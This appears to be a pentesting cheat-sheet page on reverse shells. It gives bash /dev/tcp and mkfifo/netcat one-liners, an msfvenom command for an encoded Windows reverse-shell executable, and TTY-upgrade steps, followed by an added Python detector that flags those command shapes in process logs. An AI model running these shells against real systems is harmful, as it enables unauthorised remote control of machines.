🌄
Shikata Ga Nai

Reverse Shell


Last updated 4 years ago


One-Liners

Bash

bash -i >& /dev/tcp/<IP>/<port> 0>&1

Netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f

Sometimes one one-liner won't work, but another will. Two great cheatsheets are pentestmonkey and highoncoffee.

Generate Payload

Msfvenom

Windows reverse shell with encoder

msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exe

Shell Cushions

If the reverse shell is terminal-based, some measures can be taken to make it more comfortable to use.

Spawn TTY

Python

python -c 'import pty;pty.spawn("/bin/bash")'

Auto-Completion

Background the process with Ctrl+Z.

Execute this to disable echoing and send I/O straight through without processing.

stty raw -echo

Return to the process with fg, then press Enter twice.

Additional ways to spawn TTY.

Additional cushions.
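
Seen from the defending side, the Bash and Netcat one-liners and the Python TTY spawn above leave distinctive process command lines. This is an added example, not part of the original page: a small matcher for those three shapes, where the rule names, function names and sample log lines are all constructed for illustration.

```python
import re

# Rules keyed to the command shapes shown on this page.
# Constructed for illustration; not an exhaustive or evasion-proof rule set.
RULES = {
    # Redirection of a shell's I/O into bash's /dev/tcp or /dev/udp pseudo-device.
    "bash_dev_tcp": re.compile(r"(?:>&?|<&?|<>)\s*/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    # A FIFO is created, netcat sits in the pipeline, and output loops back
    # into the same FIFO (the backreference \1 ties both ends together).
    "mkfifo_nc_pipe": re.compile(
        r"mkfifo\s+([^\s;|&]+).*\|\s*(?:nc|ncat|netcat)\b.*>\s*\1"
    ),
    # Inline Python that allocates a pseudo-terminal for a shell.
    "pty_spawn": re.compile(r"python[\d.]*\s+-c\s+.*pty\.spawn\("),
}


def classify(cmdline: str) -> list[str]:
    """Return the names of all rules matching one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(lines):
    """Yield (line_number, rule_names, cmdline) for every flagged line."""
    for n, line in enumerate(lines, 1):
        cmd = line.strip()
        hits = classify(cmd)
        if hits:
            yield n, hits, cmd


# Constructed sample of command lines as they might appear in
# process-creation logs. 192.0.2.10 is a documentation address (RFC 5737).
SAMPLE = [
    "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f",
    "python -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "nc -zv db.internal 5432",        # benign port check, no FIFO loop
    "mkfifo /run/app/events.fifo",    # benign named pipe, no netcat
    "echo ok > /dev/null",            # benign redirect, not /dev/tcp
]

if __name__ == "__main__":
    for n, hits, cmd in scan(SAMPLE):
        print(f"line {n}: {','.join(hits)}: {cmd}")
```

The three benign lines stay unflagged because each rule requires the full shape (redirect into /dev/tcp, FIFO looped through netcat, or pty.spawn under python -c), not just a single keyword.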